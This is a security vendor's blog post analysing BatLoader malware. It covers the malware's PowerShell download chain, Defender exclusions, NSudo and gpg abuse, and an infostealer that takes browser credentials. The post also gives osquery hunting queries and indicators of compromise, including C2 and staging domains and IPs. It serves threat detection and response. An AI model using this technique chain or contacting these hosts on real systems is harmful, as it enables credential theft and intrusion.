Skip to content

Contributed by: Nandakumar KJ & Josh Lemon

 

Stealthy, initial access malware known as BatLoader uses malvertising techniques. Due to how it embeds itself within a computer system, it’s challenging to fully remove it. Additionally, it makes use of legitimate tools for elevating privilege, decryption, and running malicious scripts to deploy second-stage infostealer malware, (e.g., Arkei/Vidar, Ursnif, Cobalt Strike Beacon, Rhadamanthys).

 

This blog post includes a technical analysis of the BatLoader malware along with a description of how Uptycs MDR analysts identify and remediate it. In many cases, we have provided the SQL queries used in our investigation.

 

Technical Analysis

BatLoader typically enters through malicious web pages that masquerade as trustworthy programs or software. Malvertising strategies and fake comments on forums having connections to BatLoader distribution locations can direct victims to these websites.

 

Uptycs recently observed where BatLoader initiated execution through an encoded PowerShell script. It used the WebClient.DownloadString method to retrieve the string from the URL to the local system.

 

PS1

 

Upon execution of the initial malicious PowerShell script, BatLoader executes additional PowerShell commands to add an exclusion to Windows Defender as part of a defense evasion technique.

 

MSdefender Exceptions

 

The PowerShell script also downloads and executes additional executables; zkoko.exe.gpg, Nsudo.exe, and gpg4win-2.2.5.exe. These are placed in the $USERPROFILE$\AppData\Roaming directory.

 

URL_connected _to download_Executables

Figure 3 - Domains accessed by PowerShell to collect second stage malware – osquery, DNS to process mapping

 

select * from DNS_lookup_events Where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND pid =1548 AND upt_time between timestamp '2023-03-01 05:50:00' AND timestamp '2023-03-01 06:10:00'

 

Downloaded executables

Figure 4 - Downloaded executables – Uptycs Real-Time Actions

 

The payload is decrypted using the gpg4win.exe binary, a common Windows email and file encryption package.

 

gpg2_exe

 

Nsudo.exe is a management tool to launch programs with elevated privileges. In this attack, it’s used to impair defense by hiding the window as the payload is being executed.

 

Nsudo

 

The infostealer malware, dropped by BatLoader, attempts to collect sensitive data from victims' systems via the Windows API. This includes information about system disk drives, disk types, BIOS, processor, computer name, and serial number.

Additionally, the malware crawls directories of installed browsers on a victim's machine as it attempts to collect information stores for the following: browsing histories, bookmarks, cookies, autofills, and login passwords. Once sensitive data is collected, it’s then relayed to the threat actor’s server. In the malware sample we observed, the command-and-control (C2) server (79.137.204.54) is associated with the Rhadamanthys malware family.

 

Connect_to_suspicous IP

Figure 7 - C2 server connection – contextual details in the Uptycs detection UI

 

Uptycs MDR

The Uptycs managed detection and response engine includes built-in behavioral rules, YARA signatures, and threat intelligence data. Our skilled security analyst team constantly monitors detections and hunts for widespread and active threats in the environment.

 

From this BatLoader malware sample, we observed our victim system also being infected with Rhadamanthys. Along with YARA signature detections in memory discovering it, detection included behavioral rules from known actions that malware performs along with Uptycs threat intelligence matches.

 

Additionally, Uptycs EDR contextual detection provides important details about identified malware, mapped behavior in the ATT&CK Matrix (left pane, below), and a detection graph that shows process ancestry. Users can navigate to the toolkit data section in the detection, then click on the name to learn more.

 

Yara_Detection

Figure 8 - Rhadamanthys detection

 

Built atop osquery, the Uptycs agent has the ability to collect vast, high-quality telemetry from endpoints, cloud resources, and Kubernetes systems. You can see the telemetry data in the available osquery tables (e.g., Process_events, PowerShell_events, scheduled_tasks). You can view the open-source schema here, to which Uptycs has added a significant number of additional tables.

 

Using Uptycs Investigate feature, we were able to further investigate malicious activity by running SQL queries against the osquery tables containing data collected from the endpoint where we executed the malware. 

 

Process_events

Figure 9 - Searching process_events for finding activity of suspicious user

 

select * from process_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND login_name = 'Administrator' AND upt_time between timestamp '2023-03-01 05:45:00' AND timestamp '2023-03-01 06:10:00'

Socket_events

Figure 10 - Searching socket_events to find executables that connect to the C2 server

 

select * from socket_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND upt_day =20230301 AND remote_address ='79.137.204.54'

API_events

Figure 11 - Searching api_events to find the api calls used by zokoko.exe

 

select * from api_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' and cmdline like '%powershell.exe  -command C:\Users\Administrator\AppData\Roaming\zkoko.exe%'

 

The Uptycs Managed Detection and Response (MDR) team responds to threats by using the Uptycs Protect remediation and blocking feature. It lets you kill, delete, pause, and scan the binary using YARA rules, or collect the file for additional analysis based on the detection graph for detected malicious activity (below). Additionally, we have the ability to manage users, run scripts on the host machine, quarantine the machine, or investigate the malicious process further.

 

Uptycs protect options

Figure 12 - Uptycs Protect – detection graph

 

Monitoring all potential threats in an environment is essential, especially those that abuse legitimate tools to obfuscate their presence like the BatLoader malware. The Uptycs MDR team makes this possible by detecting and taking action in response to threats in our customers environment.

 

Indicators of Compromise (IOCs)

 

   File name

Md5 hash

   zkoko.exe.gpg

199b1499566ddc2e86e3ea3e4db7f3ff

   Nsudo.exe

5cae01aea8ed390ce9bec17b6c1237e4

   gpg4win-2.2.5.exe

67a4f35cae2896e3922f6f4ab5966e2b

   zkoko.exe

3f82d9d43d56e56d523b2457bf6fa839

Domain/URL/IP Address

    job-lionserver.site

    job-lionserver.ru

    81.177.165.87

    185.199.111.133

    79.137.204.54

Malware Samples

https://www.virustotal.com/gui/file/19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

https://www.virustotal.com/gui/file/43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441